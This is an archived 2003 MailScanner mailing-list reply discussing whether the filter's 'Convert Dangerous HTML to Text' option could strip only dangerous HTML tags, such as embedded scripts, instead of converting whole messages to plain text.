Content Checks: Detected HTML-specic exploits in h8AGGVSe016972

Kevin Spicer kevins at BMRB.CO.UK
Thu Sep 11 16:08:13 IST 2003


On Thu, 2003-09-11 at 15:36, Ugo Bellavance wrote:

>>> I think he means that he would like to have the HTML cleaned from
harmful tags, but without converting into text.

>Ugo

>Surely this is precisely what "Convert Dangerous HTML to Text = yes" is
>for?
>Or am I misunderstanding that MS option?

"Convert Dangerous HTML to Text" converts the _entire_ html message to
text if any of the objectionable tags are found.  What I was suggesting
was that a better filter would only remove the dangerous/objectionable
tags.  This however is not as simple as it sounds, and there are all
sorts of things that need thinking about, for example its possible to
create a form (or other html content) using embedded javascript etc.
therfore all script content should be removed etc. etc.

By the way I'm not 'objecting' to the current implementation as someone
suggested, for the most part it works well and has definitely stopped
some otherwise dangerous content.  I'm just saying that a more involved
process may improve the user experience.

Personally I'm thinking about applying a ruleset so all my incoming
message get converted to text, which might stop the exchange admin
bothering me about the size of my mailbox so often!




BMRB International
http://www.bmrb.co.uk
+44 (0)20 8566 5000
_________________________________________________________________
This message (and any attachment) is intended only for the
recipient and may contain confidential and/or privileged
material.  If you have received this in error, please contact the
sender and delete this message immediately.  Disclosure, copying
or other action taken in respect of this email or in
reliance on it is prohibited.  BMRB International Limited
accepts no liability in relation to any personal emails, or
content of any email which does not directly relate to our
business.



More information about the MailScanner mailing list